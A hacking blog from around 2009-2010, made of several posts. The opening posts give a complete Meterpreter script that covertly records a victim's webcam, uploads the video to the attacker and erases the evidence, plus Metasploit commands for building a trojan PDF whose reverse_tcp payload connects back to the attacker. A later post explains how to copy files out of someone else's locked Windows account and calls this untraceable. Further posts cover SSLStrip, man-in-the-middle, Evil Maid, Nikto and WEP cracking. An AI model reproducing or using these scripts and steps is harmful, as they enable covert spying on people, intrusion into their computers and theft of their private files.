Remote Webcam Hack Script

Aug 302010

Activate Remote PC Webcam and Record the Victim.

This is a nice little script that will record from victims webcam & upload the output to your/the attackers machine then clean up after itself leaving no evidence.

Run the following command once you have a session started using the Metasploit Meterpreter, as shown in the previous tutorial.

meterpreter > run camrecorder -t 30

Code:

######################################################
# Webcam Recorder Meterpreter  Script by Intern0t.net#
# Michael Johnson  (Zero Cold)  mjog123@hotmail.com  #
# Recorder idea  by Jake Johnstone    aka. Sud0x3    #
######################################################

session = client

host,port = session.tunnel_peer.split(‘:’)

#Menu-Options

@@exec_opts = Rex::Parser::Arguments.new(

“-h” => [ false, "Help menu." ],

“-t” => [ true,  "Time limit in seconds.( 01 to 60 )" ])

def usage

print_line(“Webcam Recorder Meterpreter  Script by Intern0t.net”)

print_line(” Michael Johnson  (Zero Cold)  mjog123@hotmail.com “)

print_line(“###################################################”)

print_line(“Usage: camrecorder -t <time> “)

print(@@exec_opts.usage)

raise Rex::Script::Completed

end

#Files to upload to target host

ffmpegexe = File.join(Msf::Config.install_root, “data”, “upload.exe”)

#Function to upload files

def upload(session,file)

location = session.fs.file.expand_path(“%TEMP%”)

fileontrgt = “#{location}\\upload.exe”

print_status(“Uploading Self Extracting Archive …”)

session.fs.file.upload_file(“#{fileontrgt}”,”#{file}”)

print_status(“Upload Complete …”)

return fileontrgt

end

#Capture video from webcam

def camrec(client,session,time)

location = session.fs.file.expand_path(“%TEMP%”)

print_status(“Extracting …”)

session.sys.process.execute(“cmd /c “”#{location}\\upload.exe”, nil,{‘Hidden’ => true,’Channelized’ => false})

sleep 5

print_status(“Starting Capture of #{time}’s…”)

session.sys.process.execute(“cmd.exe /c #{location}\\ffmpeg -f vfwcap -r 20 -v 10 -i 0 -t 00:00:#{time} #{location}//output.avi”, nil,{‘Hidden’ => true,’Channelized’ => false})

end

#Download Output File

def download(session)

location = session.fs.file.expand_path(“%TEMP%”)

print_status(“Downloading Capture …”)

fileontrgt = “#{location}\\output.avi”

file = “/root#{::File::Separator}capture.avi”

session.fs.file.download_file(file,fileontrgt)

print_status(“File Downloaded to #{file}”)

end

#Deleting left over files

def delfiles(session)

location = session.fs.file.expand_path(“%TEMP%”)

print_status(“Deleting Left Over Files …”)

print_status(“Deleting output.avi …”)

session.sys.process.execute(“cmd.exe /c del #{location}\\output.avi”, nil, {‘Hidden’ => true})

print_status(“Deleting ffmpeg.exe …”)

session.sys.process.execute(“cmd.exe /c del #{location}\\ffmpeg.exe”, nil, {‘Hidden’ => true})

print_status(“Deleting upload.exe …”)

session.sys.process.execute(“cmd.exe /c del #{location}\\upload.exe”, nil, {‘Hidden’ => true})

print_status(“All Files Removed …”)

end

#Menu-Imput

time = 0

@@exec_opts.parse(args) { |opt, idx, val|

case opt

when  ”-t”

time = val

when  ”-h”

usage

end

}

if time  != 0

upload(session,ffmpegexe)

camrec(client,session,time)

sleep(time.to_i)

download(session)

delfiles(session)

else

usage

end

Download code and files here:

http://www.4shared.com/file/189489631/badb38f/_2__camrecorder.html

How to Create - Adobe Acrobat PDF Exploit Trojan

Aug 302010

Hack your PDF and insert a Trojan virus.

Tools required to hack your PDF and insert our Trojan virus are Metasploit. I am using Backtrack 4 R1 with Metasploit v3.4.2-dev.

Open a terminal window and change directory to the following and run msfconsole:

#  cd /pentest/exploits/framework3

# ./msfconsole

Once the console is open follow the commands below completing the three options as required. The LHOST is your IP, for external WAN addresses you may need to port forward the LPORT you choose to your internal NAT address. Port 80 can be used if remote firewall issues prevent access.

msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

FILENAME
INFILENAME
OUTOUTPATH
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.2.3
msf exploit(adobe_pdf_embedded_exe) > set LPORT 4455

msf exploit(adobe_pdf_embedded_exe) > exploit

Send created PDF to victim

msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.2.3
msf exploit(handler) > set LPORT 4455
msf exploit(handler) > exploit

Wait for them to open the PDF then  once a session has opened.

meterpreter > execute -f cmd.exe -c -H -i

Psnuffle Password Sniffer for Metasploit

Dec 012009

Max Moser (Metasploit) We Love You

We are not Gay for that Remark

Max Moser submitted a new version of the psnuffle credential sniffer addon to the metasploit team. Until HDM has reviewed it and merged it into the svn they uploaded a tgz to remote-exploit.org’s code section http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz Please note that it will be removed when its officially available within the metasploit svn. Checkout the demo video http://vimeo.com/6013518 if you like to see it in action. Currently they included pop3, imap, ftp and a HTTP Get sniffer module. Modules are very simple to code, so they expect new ones every few days.

With psnuffle metasploit got a credential sniffer in place. Its easy to use and extend. Writing a new module just takes some minutes.

Computers will soon be good as stylish, classy paperweights.

Hacking Files From a Windows PC – It’s Easy

Dec 012009

Don’t Know Their Password, But Want Their Files?

I find myself constantly harangued by colleagues engulfed by a probable misguided dose of misogyny. The answer sought :

If I lost my partners ‘Windows password’ and needed to access an important file within her ‘locked account’ on our shared PC; for reasons none other than to ‘obtain information’ that would steer course to the purchase of a birthday surprise of mammoth magnitude, bestowing happiness beyond that said to be experienced only by those long lost fabled dwellers of Shangri-La.

How could this be accomplished?

I will show you.

THIS IS NOT TRACEABLE

  • We are going to use what is generally referred to as a ‘Live Distribution DVD’. This is a complete Linux Operating System that is built to run entirely from a CD / DVD without even touching your PC’s local hard drive (great eh). We will be using the FRHACK version of Backtrack 4 pre-release (Ubuntu Matrix style) which is proper fully loaded with all the latest hacking tools. Download a version of Backtrack 4 using this link Backtrack4-FRHACK .
  • Once downloaded burn the ISO to a DVD using your favorite ISO burning software, or download for free InfraRecorder (recommended to us by Google’s Matt Cutts, and it actually works).
  • Ensure your PC is configured to boot from CD/DVD. Insert the Backtrack DVD and kick start your pc. If all goes well you should hear the DVD spin and the Backtrack Live DVD start to boot up. After a few seconds you will be faced with a command prompt. Type startx[Enter].

Now the Fun Begins

These instructions will be numbered and concise of course. There are many ways to skin this minks/minx, but I am going to show you my way (easy way). I will explicate simply for the educated how exactly to hack Windows. Text to type will be colored red for those with impaired color perception.

1. This is actually 1a. DONT DO IT.
1.b-z Do the above, burn yourself a nice DVD bootable version of the French Security people’s excellent adaptation of Max Moser’s Backtrack 4 and then boot the DVD with your carrier thumb drive inserted, and then as per the following diagram open a shell window.

Microsoft is good as lulabims

Backtrack being none other than a collaboration of:

Metasploit integration
RFMON Injection capable wireless drivers
Kismet
AutoScan-Network – AutoScan-Network is a network discovering and managing application
Nmap
Ettercap
Wireshark (formerly known as Ethereal)

BackTrack’s functionality further increases with the arrangement of each tool in 16 categories. The tool categories are as follows -

Enumeration
Exploit Archives
Scanners
Password Attacks
Fuzzers
Spoofing
Sniffers
Tunneling
Wireless Tools
Bluetooth
Cisco Tools
Database Tools
Forensic Tools
Reversing

In relation to basic software packages, BackTrack throws in the mix some ordinary desktop programs such as Mozilla Firefox, Pidgin, K3b, and XMMS.

For those that didn’t understand, they’ve only just gone and got all the little Muther hacking crotchet tools ever invented and wrapped them up in a free CD bundle just for you.

2. Drive numbers may be different, look to the size for clues. Linux labels disks without numbers, sda, sdb, etc and partitions with numbered extensions.

Let’s assume our target drive is sda and the partition sda1. When we booted our PC we had already inserted our blank USB carrier thumb drive which is now labeled sdb, and  to which we will copy our desired content.

The following diagram shows just how we can view these drives and just how we’re able to access/copy our files.

Note: fdisk<space>minus<nospace>[small el] should be typed as fdisk -l

Micro-S is going down

Remember your drives / partitions may be numbered differently to this tutorial.
They could =  sdb, sdc, sdd, sde, sdf, etc, etd.

Also note it is important that your windows drive/PC was previously shut down correctly to proceed. If an error occurs, please revert, then close your windows drive appropriately and proceed.

3. Now we have to plug our target and carrier drive into our Linux environment (screen shot below).
mkdir /mnt/sda1
mkdir /mnt/sdb1
mount /dev/sda1 /mnt/sda1
mount /dev/sdb1 /mnt/sdb1

Bring it on Mac

Please remember your drive number allocations may differ, so take care.

4. We have now made both our target and carrier drives accessible within our ‘Backtrack Live CD’ Linux hacking environment.

5. Using such syntax as cd and cp we are now able to navigate to our mounted target and perform our copy. Remember Linux is case sensitive and quotes should be used either side of Windows paths that are spaced out.

theft

For loved ones.

Pink is good.

"Man in the Middle" & Marlinspike - SSL Strip

Nov 112009

SSLStrip and Hacking Your Passwords

Marlinspike made a great presentation in Blackhat this year on how to subvert SSL (HTTPS) protection used bu major sites around the Internet for security. The interesting thing is that he does not really break the SSL protocol itself, but instead demonstrates that as HTTP is the entry point into any SSL communication, subverting HTTP allows a hacker to take control of the HTTPS communication as well.

Marlinspike also released the SSLStrip tool to automate this attack. Download SSLstrip from Moxie’s website or from here. Using the SSLStrip tool Marlinspike was able to retreive over 130 usernames and passwords over a Tor network. These credentials were from sites such as Gmail, Yahoo, Linkedin, Paypal etc.

The way the SSLStrip tool works by:

  1. Does an MITM on the HTTP connection
  2. Replaces all the HTTPS links with HTTP ones but remembers the links which were changed
  3. Communicates with the victim client on an HTTP connection for any secure link
  4. Communicates with the legitimate server over HTTPS for the same secure link
  5. Communication is transparently proxied between the victim client and the legitimate server
  6. Images such as the favicon are replaced by images of the familiar “secure lock” icon, to build trust
  7. As the MITM is taking places all passwords, credentials etc are stolen without the Client knowing

Marlinspike also discusses other techniques such as homograph attacks to make a URL look like a legitimate one. The overall talk is very interesting. You can download the presentation slides here. The video posted below is of the actual Blackhat talk given by Marlinspike.

Hiren's BootCD

Nov 102009

Repair, Fix, Hack (Windows Passwords) & Clean / Erase  / Delete

I needed to dig out this little gem again recently for a small disk repair task, so I thought I would point it out again to those that hadn’t come across it, but were searching for some nice little bootable Dos / Windows / Linux tools to repair, fix, hack and delete/clean.

Hiren’s BootCd is a nice little all in One Bootable CD which has all these utilities:

Partition Tools
Partition Magic Pro 8.05

Best software to partition hard drive

Acronis Disk Director 10.0.2160

Popular disk management functions in a single suite

Paragon Partition Manager 7.0.1274

Universal tool for partitions

Partition Commander 9.01

The safe way to partition your hard drive,with undo feature

Ranish Partition Manager 2.44

a boot manager and hard disk partitioner.

The Partition Resizer 1.3.4

move and resize your partitions in one step and more.

Smart Fdisk 2.05

a simple harddisk partition manager

SPecial Fdisk 2000.03v

SPFDISK a partition tool.

eXtended Fdisk 0.9.3

XFDISK allows easy partition creation and edition

GDisk 1.1.1

Complete replacement for the DOS FDISK utility and more.

Super Fdisk 1.0

Create, delete, format partitions drives without destroying data.

Partition Table Editor 8.0

Partition Table and Boot Record Editor

EASEUS Partition Master 4.0.1

Partition Resize/Move/Copy/Create/Delete/Format/Convert, Explore, etc.
Backup Tools
ImageCenter 5.6 (Drive Image 2002)

Best software to clone hard drive

Norton Ghost 11.5

Similar to Drive Image (with usb/scsi support)

Acronis True Image 8.1.945

Create an exact disk image for complete system backup and disk cloning.

Partition Saving 3.71

A tool to backup/restore partitions. (SavePart.exe)

COPYR.DMA Build013

A Tool for making copies of hard disks with bad sectors

DriveImageXML 2.02

backup any drive/partition to an image file, even if the drive is currently in use

Drive SnapShot 1.39

creates an exact Disk Image of your system into a file while windows is running.

Ghost Image Explorer 11.5

to add/remove/extract files from Ghost image file

DriveImage Explorer 5.0

to add/remove/extract files from Drive image file

WhitSoft File Splitter 4.5a

a Small File Split-Join Tool

InfraRecorder 0.50

An Open source CD/DVD burning software, also create/burn .iso images

FastCopy 1.99r4

The Fastest Copy/Delete Software on Windows

Smart Driver Backup 2.12

Easy backup of your Windows device drivers (also works from PE)

Double Driver 2.1

Driver Backup and Restore tool

DriverBackup! 1.0.3

Another handy tool to backup drivers
Recovery Tools
Active Partition Recovery 3.0

To Recover a Deleted partition.

Active Uneraser 3.0

To recover deleted files and folders on FAT and NTFS systems.

Ontrack Easy Recovery Pro 6.10

To Recover data that has been deleted/virus attack

Winternals Disk Commander 1.1

more than just a standard deleted-file recovery utility

TestDisk 6.11.3

Tool to check and undelete partition from Dos/Windows

Lost & Found 1.06

a good old data recovery software.

DiyDataRecovery Diskpatch 2.1.100

An excellent data recovery software.

Prosoft Media Tools 5.0 v1.1.2.64

Another excellent data recovery software with many other options.

PhotoRec 6.11.3

Tool to Recover File and pictures from Dos/Windows

Active Undelete 5.5

a tool to recover deleted files

Restoration 3.2.13

a tool to recover deleted files

GetDataBack for FAT 4.0

Data recovery software for FAT file systems

GetDataBack for NTFS 4.0

Data recovery software for NTFS file systems

Recuva 1.29.429

Restore deleted files from Hard Drive, Digital Camera Memory Card, usb mp3 player…

Partition Find and Mount 2.3.1

Partition Find and Mount software is designed to find lost or deleted partitions

Unstoppable Copier 4.2

Allows you to copy files from disks with problems such as bad sectors,

scratches or that just give errors when reading data.
Testing Tools
System Speed Test 4.78

it tests CPU, harddrive, ect.

PC-Check 6.05

Easy to use hardware tests

Ontrack Data Advisor 5.0

Powerful diagnostic tool for assessing the condition of your computer

The Troubleshooter 7.02

all kind of hardware testing tool

PC Doctor 2004

a benchmarking and information tool

CPU/Video/Disk Performance Test 5.7

a tool to test cpu, video, and disk

Test Hard Disk Drive 1.0

a tool to test Hard Disk Drive

Disk Speed1.0

Hard Disk Drive Speed Testing Tool

S&M Stress Test 1.9.1

cpu/hdd/memory benchmarking and information tool, including temperatures/fan speeds/voltages

IsMyLcdOK (Monitor Test) 1.02

Allows you to test CRT/LCD/TFT screens for dead pixels and diffective screens
RAM (Memory) Testing Tools
GoldMemory 5.07

RAM Test utility

Memtest86+ 2.11

PC Memory Test

MemTest 1.0

a Memory Testing Tool

Video Memory Stress Test 1.7.116

a tool to thoroughly test your video RAM for errors and faults
Hard Disk Tools
Hard Disk Diagnostic Utilities

Seagate Seatools Graphical v2.13b

SeaTools for Dos 1.10

Western Digital Data Lifeguard Tools 11.2

Western Digital Diagnostics (DLGDIAG) 5.04f

Maxtor PowerMax 4.23

Maxtor amset utility 4.0

Maxtor(or any Hdd) Low Level Formatter 1.1

Fujitsu HDD Diagnostic Tool 7.00

Fujitsu IDE Low Level Format 1.0

Samsung HDD Utility(HUTIL) 2.10

Samsung Disk Diagnose (SHDIAG) 1.28

Samsung The Drive Diagnostic Utility (ESTOOL) 3.00g

IBM/Hitachi Drive Fitness Test 4.15

IBM/Hitachi Feature Tool 2.13

Gateway GwScan 5.12

ExcelStor’s ESTest 4.50

MHDD 4.6

WDClear 1.30

Toshiba Hard Disk Diagnostic 2.00b

HDD Regenerator 1.71

to recover a bad hard drive

HDAT2 4.53

main function is testing and repair (regenerates) bad sectors for detected devices

Ontrack Disk Manager 9.57

Disk Test/Format/Maintenance tool.

Norton Disk Doctor 2002

a tool to repair a damaged disk, or to diagnose your hard drive.

Norton Disk Editor 2002

a powerful disk editing, manual data recovery tool.

Hard Disk Sentinel 0.04

Hard Disk health, performance and temperature monitoring tool.

Active Kill Disk 4.1

Securely overwrites and destroys all data on physical drive.

SmartUDM 2.00

Hard Disk Drive S.M.A.R.T. Viewer.

Victoria 3.33e and 3.52rus

a freeware program for low-level HDD diagnostics

HDD Erase 4.0

Secure erase using a special feature built into most newer hard drives

HDD Scan 3.2

HDDScan is a Low-level HDD diagnostic tool, it scans surface find bad sectors etc.

HDTune 2.55

Hard disk benchmarking and information tool.

Data Shredder 1.0

A tool to Erase disk and files (also wipe free space) securely
System Information Tools
PCI and AGP info Tool (2908)

The PCI System information & Exploration tool.

System Analyser 5.3w

View extensive information about your hardware

Navratil Software System Information 0.60.32

High-end professional system information tool

Astra 5.43

Advanced System info Tool and Reporting Assistant

HWiNFO 5.3.0

a powerful system information utility

PC-Config 9.33

Complete hardware detection of your computer

SysChk 2.46

Find out exactly what is under the hood of your PC

CPU Identification utility 1.17

Detailed information on CPU (CHKCPU.EXE)

CTIA CPU Information 2.7

another CPU information tool

Drive Temperature 1.0

Hard Disk Drive temperature meter

PC Wizard 2009.1.90

Powerful system information/benchmark utility designed especially for detection of hardware.

SIW 2009-07-28

Gathers detailed information about your system properties and settings.

CPU-Z 1.52

It gathers information on some of the main devices of your system

PCI 32 Sniffer 1.4 (2908)

device information tool (similar to unknown devices)

Unknown Devices 1.2 (2908)

helps you find what those unknown devices in Device Manager really are

USBDeview 1.42

View/Uninstall all installed/connected USB devices on your system
MBR (Master Boot Record) Tools
MBRWork 1.07b

a utility to perform some common and uncommon MBR functions

MBR Tool 2.2.100

backup, verify, restore, edit, refresh, remove, display, re-write…

DiskMan4

all in one tool for cmos, bios, bootrecord and more

BootFix Utility

Run this utility if you get ‘Invalid system disk’

MBR SAVE / RESTORE 2.1

BootSave and BootRest tools to save / restore MBR

Boot Partition 2.60

add Partition in the Windows NT/2000/XP Multi-boot loader

Partition Table Doctor 3.5

a tool to repair/modify mbr, bootsector, partition table

Smart Boot Manager 3.7.1

a multi boot manager

Bootmagic 8.0

This tool is for multi boot operating systems

MBRWizard 2.0b

Directly update and modify the MBR (Master Boot Record)
BIOS / CMOS Tools
CMOS 0.93

CMOS Save / Restore Tool

BIOS Cracker 4.8

BIOS password remover (cmospwd)

BIOS Cracker 1.4

BIOS password remover (cmospwc)

BIOS Utility 1.35.0

BIOS Informations, password, beep codes and more.

!BIOS 3.20

a powerfull utility for bios and cmos

DISKMAN4

a powerful all in one utility

UniFlash 1.40

bios flash utility

Kill CMOS

a tiny utility to wipe cmos

Award DMI Configuration Utility 2.43

DMI Configuration utility for modifying/viewing the MIDF contents.
MultiMedia Tools
Picture Viewer 1.94

Picture viewer for dos, supports more then 40 filetypes.

QuickView Pro 2.58

movie viewer for dos, supports many format including divx.

MpxPlay 1.56

a small Music Player for dos
Password Tools
Active Password Changer 3.0.420

To Reset User Password on windows NT/2000/XP/2003/Vista (FAT/NTFS)

Offline NT/2K/XP Password Changer

utility to reset windows nt/2000/xp administrator/user password.

Registry Reanimator 1.02

Check and Restore structure of the Damaged Registry files of NT/2K/XP

NTPWD

utility to reset windows nt/2000/xp administrator/user password.

Registry Viewer 4.2

Registry Viewer/Editor for Win9x/Me/NT/2K/XP

ATAPWD 1.2

Hard Disk Password Utility

TrueCrypt 6.2a

On-the-fly disk encryption tool, can create a virtual encrypted disk within a file and mount it as a real disk, can also encrypt an entire HDD/Partition/USB Drive

Content Advisor Password Remover 1.01

It Removes Content Advisor Password from Internet Explorer

Password Renew 1.1

Utility to (re)set windows passwords

WindowsGate 1.1

Enables/Disables Windows logon password validation

WinKeyFinder 1.73

Allows you to View and Change Windows XP/2003 Product Keys, backup and restore

activation related files, backup Microsoft Office 97, 2000 SP2, XP/2003 keys etc.

XP Key Reader 2.7

Can decode the XP-key on Local or Remote systems

ProduKey 1.36

Recovers lost the product key of your Windows/Office

Wireless Key View 1.27

Recovers all wireless network keys (WEP/WPA) stored in your computer by WZC

MessenPass 1.26

A password recovery tool that reveals the passwords of several instant messangers

Mail PassView 1.51

Recovers mail passwords of Outlook Express, MS Outlook, IncrediMail, Eudora, etc.

Asterisk Logger 1.04

Reveal passwords hidden behind asterisk characters
NTFS (FileSystems) Tools
NTFS Dos Pro 5.0

To access ntfs partitions from Dos

NTFS 4 Dos 1.9

To access ntfs partitions from Dos

Paragon Mount Everything 3.0

To access NTFS, Ext2FS, Ext3FS partitions from dos

NTFS Dos 3.02

To access ntfs partitions from Dos

EditBINI 1.01

to Edit boot.ini on NTFS Partition
Browsers / File Managers
Volkov Commander 4.99

Dos File Manager with LongFileName/ntfs support

(Similar to Norton Commander)

Dos Command Center 5.1

Classic dos-based file manager.

File Wizard 1.35

a file manager – colored files, drag and drop copy, move, delete etc.

File Maven 3.5

an advanced Dos file manager with high speed PC-to-PC file

transfers via serial or parallel cable

FastLynx 2.0

Dos file manager with Pc to Pc file transfer capability

LapLink 5.0

the smart way to transfer files and directories between PCs.

Dos Navigator 6.4.0

Dos File Manager, Norton Commander clone but has much more features.

Mini Windows 98

Can run from Ram Drive, with ntfs support,

Added 7-Zip, Disk Defragmenter, Notepad / RichText Editor,

Image Viewer, .avi .mpg .divx .xvid Movie Player, etc…

Mini Windows Xp

Portable Windows Xp that runs from CD/USB/Ram Drive, with Network and SATA support

7-Zip 4.65

File Manager/Archiver Supports 7z, ZIP, GZIP, BZIP2, TAR, RAR, CAB, ISO, ARJ, LZH, CHM, MSI, WIM, Z, CPIO, RPM, DEB and NSIS formats

Opera Web Browser 8.53

One of the fastest, smallest and smartest full-featured web browser
Other Tools
Ghost Walker 11.5

utility that changes the security ID (SID) for Windows NT, 2000 and XP

DosCDroast beta 2

Dos CD Burning Tools

Universal TCP/IP Network 6.4

MSDOS Network Client to connect via TCP/IP to a Microsoft based

network. The network can either be a peer-to-peer or a server based

network, it contains 91 different network card drivers

HxD 1.7.7.0

Hex Editor provides tools to inspect and edit files, main memory, disks/disk images

Virtual Floppy Drive 2.1

enables you to create and mount a virtual floppy drive on your NT/2000/XP/Vista

Streams 1.56

Reveal/Delete NTFS alternate data streams

NewSID 4.10

utility that changes the security ID (SID) for Windows NT, 2000 and XP
Dos Tools
USB CD-Rom Driver 1

Standard usb_cd.sys driver for cd drive

Universal USB Driver 2

Panasonic v2.20 ASPI Manager for USB mass storage

ASUSTeK USB Driver 3

ASUS USB CD-ROM Device Driver Version 1.00

SCSI Support

SCSI Drivers for Dos

SATA Support

SATA Driver (gcdrom.sys) and JMicron JMB361 (xcdrom.sys) for Dos

1394 Firewire Support

1394 Firewire Drivers for Dos

Interlnk support at COM1

To access another computer from COM port

Interlnk support at LPT1

To access another computer from LPT port

and too many great dos tools

very good collection of dos utilities

extract.exe pkzip.exe pkunzip.exe unrar.exe rar.exe
ace.exe lha.exe gzip.exe uharcd.exe mouse.com
attrib.com deltree.exe xcopy.exe diskcopy.com imgExtrc.exe
undelete.com edit.com fdisk.exe fdisk2.exe fdisk3.exe
lf.exe delpart.exe wipe.com zap.com format.com
move.exe more.com find.exe hex.exe debug.exe
split.exe mem.exe mi.com sys.com smartdrv.exe
xmsdsk.exe killer.exe share.exe scandisk.exe scanreg.exe
guest.exe doskey.exe duse.exe biosdtct.exe setver.exe
intersvr.exe interlnk.exe loadlin.exe lfndos.exe doslfn.com
Cleaners
SpaceMonger 1.4

keeping track of the free space on your computer

WinDirStat 1.1.2.80

a disk usage statistics viewer and cleanup tool for Windows.

CCleaner 2.23.993

Crap Cleaner is a freeware system optimization and privacy tool
Optimizers
PageDfrg 2.32

System file Defragmenter For NT/2k/XP

NT Registry Optimizer 1.1j

Registry Optimization for Windows NT/2000/2003/XP/Vista

DefragNT 1.9

This tool presents the user with many options for disk defragmenting

JkDefrag 3.36

Free disk defragment and optimize utility for Windows 2000/2003/XP/Vista
Network Tools
Angry IP Scanner 2.21

Scan IP addresses in any range as well as any their ports

CurrPorts 1.66

displays the list of all currently opened TCP and UDP ports on your computer

TCPView 2.54

Lists TCP and UDP endpoints, including the Local/Remote addresses of TCP connections

Winsock 2 Fix for 9x

to fix corrupted Winsock2 information by poorly written Internet programs

XP TCP/IP Repair 1.0

Repair your Windows XP Winsock and TCP/IP registry errors
Process Tools
IB Process Manager 1.04

a little process manager for 9x/2k, shows dll info etc.

Process Explorer 11.33

shows you information about which handles and DLLs processes have opened or loaded

OpenedFilesView 1.40

View opened/locked files in your system, sharing violation issues

Pocket KillBox 2.0.0.978

can be used to get rid of files that stubbornly refuse to allow you to delete them

ProcessActivityView 1.10

Detailed process access information read/write/opened files etc

Unlocker 1.8.7

This tool can delete file/folder when you get this message – Cannot delete file:

Access is denied, The file is in use by another program etc.
Registry Tools
RegScanner 1.77

Tool to find/search in the Registry of Windows

Registry Editor PE 0.9c

Easy editing of remote registry hives and user profiles

Registry Restore Wizard 1.0.4

Restores a corrupted system registry from Xp System Restore
Startup Tools
Autoruns 9.53

Displays All the entries from startup folder, Run, RunOnce, and other Registry keys,

Explorer shell extensions,toolbars, browser helper objects, Winlogon notifications,

auto-start services, Scheduled Tasks, Winsock, LSA Providers, Remove Drivers

and much more which helps to remove nasty spyware/adware and viruses.

Silent Runners Revision 59

A free script that helps detect spyware, malware and adware in the startup process

Startup Control Panel 2.8

a tool to edit startup programs

Startup Monitor 1.02

it notifies you when any program registers itself to run at system startup

HijackThis 2.0.2

a general homepage hijackers detector and remover and more
Tweakers
Dial a Fix 0.60.0.24

Fix errors and problems with COM/ActiveX object errors and missing registry entries,

Automatic Updates, SSL, HTTPS, and Cryptography service (signing/verification)

issues, Reinstall internet explorer etc. comes with the policy scanner

Ultimate Windows Tweaker 2.0

A TweakUI Utility for tweaking and optimizing Windows Vista

TweakUI 2.10

This PowerToy gives you access to system settings that are not exposed in the Windows Xp

Xp-AntiSpy 3.97.4 beta

it tweaks some Windows XP functions, and disables some unneeded Windows services quickly

Shell Extensions Manager (ShellExView) 1.40

An excellent tool to View and Manage all installed Context-menu/Shell extensions

EzPcFix 1.0.0.16

Helpful tool when trying to remove viruses, spyware, and malware

RemoveWGA 1.2

Windows Genuine Advantage Notifications Removal tool

RRT – Remove Restrictions Tool 3.0

To Re-enable Ctrl+Alt+Del, Folder Options and Registry tools etc.
Antivirus Tools
Kaspersky Virus Removal Tool 7.0.0.290 (2908)

Free on-demand virus scanner from Kaspersky Lab to remove viruses.

Spybot – Search & Destroy 1.6.2 (2908)

Application to scan for spyware, adware, hijackers and other malicious software.

Malwarebytes’ Anti-Malware 1.40 (2908)

anti-malware application that can thoroughly remove even the most advanced malware.

SpywareBlaster 4.2 (2908)

Prevent the installation of spyware and other potentially unwanted software.

SmitFraudFix 2.423

This removes Some of the popular Desktop Hijack malware

ComboFix (2908)

Designed to cleanup malware infections and restore settings modified by malware

CWShredder 2.19

Popular CoolWebSearch Trojan Remover tool

RootkitRevealer 1.7.1

Rootkit Revealer is an advanced patent-pending root kit detection utility.

SuperAntispyware 4.27 (2908)

Remove Malware, Rootkits, Spyware, Adware, Worms, Parasites (a must have tool)

What is a "Man in the Middle" Attack?

Nov 092009

Attack Using Man in the Middle Explained

This is an attack where an attacker puts their system in a strategic position between two communicating systems, i.e. your home PC and Hotmail.

Once in this position, the attacker can launch an array of attacks focused on intercepting passing data between both systems.

When a system/victim tries to access a network resource, it will initially send requests to other network devices asking for the MAC address associated with the website/resource/IP it intends to reach. The requester will keep the IP – MAC association in its cache, the ARP cache, to speed up new connections to the same IP address.

The attack comes when the victim asks other network partners to find the MAC address associated with an IP address and the attacker answers with fake replies stating that the IP address is associated with its own MAC address and this will “short-cut” the real IP – MAC association answer from the real host and route the victim’s data traffic through the attackers system.

Tutorial to follow.

Nikto Web Server Scanner - Tools to hack websites

Oct 292009

Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated.

Latest version of Nikto is released 2.1.0 with latest features.

NiktoChanges made:

Rewrite to the plugin engine allowing more control of the plugin structure and making it easier to add plugins.

Rewrite to the reporting engine allowing reporting plugins to cover more and also ensuring that output is written if Nikto is quit before finishing.

Large overhaul of documentation to document built-in methods and variables (available in the tarball or on cirt.net.

Addition of caching to reduce amount of calls made to the web servers, as well as a facility to disable smart 404 guessing.

Addition of simple guessing for whether a system is an embedded device and to report what it is

Plugin to use OWASPs dictionary lists to attempt to brute force directories on the remote web server (as mutate 6)

Plugin to attempt to brute force domains (as mutate 5)

Allow username guessing (mutate 3 and 4) to use a dictionary file as well as brute forcing

Support for NTLM authentication

Lots of bug fixes and new security checks

Nikto Tutorial

Download Nikto here

How to Defeat TrueCrypt in One Minute

Oct 192009

Defeat TrueCrypt

Full-disk encryption is often heralded as a panacea to the huge problems of data breaches and laptop thefts, and with good reason. Making the data on a laptop or other device unreadable makes the machine far less attractive or valuable to a thief. However, researchers are showing that this solution has its share of weaknesses, too.

evil_maid

Joanna Rutkowska, a well-known security researcher known mostly for her work on low-level rootkits and virtualization, has published a tool that enables an attacker to boot a protected laptop from a USB drive, record the encryption tool’s passphrase and then decrypt its contents without trouble. Known as Evil Maid, Rutkowska said the attack is simple enough to be pulled off by a hotel housekeeper and is effective against TrueCrypt.

The TrueCrypt Attack

The attack works like this: A laptop user, even one who is paranoid enough to power down his encrypted machine, leaves it alone for a few minutes. An attacker inserts the USB drive containing Evil Maid into the laptop and boots the machine from the USB drive. The tool installs a sniffer on the laptop, which will then log the encryption passphrase the next time the user enters it. The passphrase can be stored on the disk and then recovered by the attacker later.

Rutkowska said the Evil Maid tool is a very simple implementation that could be improved upon.

The provided implementation is extremely simple. It first reads the first 63 sectors of the primary disk (/dev/sda) and checks (looking at the first sector) if the code there looks like a valid TrueCrypt loader. If it does, the rest of the code is unpacked (using gzip) and hooked. Evil Maid hooks the TC’s function that asks user for the passphrase, so that the hook records whatever passphrase is provided to this function. We also take care about adjusting some fields in the MBR, like the boot loader size and its checksum. After the hooking is done, the loader is packed again and written back to the disk.

Simple enough, and no mean feat to prevent.

Hacking Wireless Networks for Dummies (WEP Encryption-aircrack-ng).

Oct 062009

WEP Encryption – Do You Have Secure Wireless Internet Network Access?

WEP Encryption for Wireless Networks, what a joke.
Any service provider that sends a spring ironed uniformed engineer to its clients home / workplace armed with a toolbox degree in obtuse angles, a pre-configured router and a perfunctory ‘Welcome to our world’ smile, may as well be selling Peckham spring water to our school kids.

My 60 year old (dearly loved) Mother orders an internet package from a reputable high street vendor so that she may contact her family abroad and additionally, when required perform a little online banking or perhaps shopping. She gets her WEP encrypted wireless router. It’s fantastic, works as sold and the considerate engineer has even refrained from changing the default router admin password (admin, password or 1111 depending on the make) to avoid confusion. Even better still (not relevant to this topic but still a concern and will be discussed later) the router is left open to remote management. Scan a range of Internet Addresses (IP’s) allocated to any Internet Service Provider (ISP) with the right tools you will find a plethora of routers with default passwords open to abuse. This topic will be discussed further at a later date.

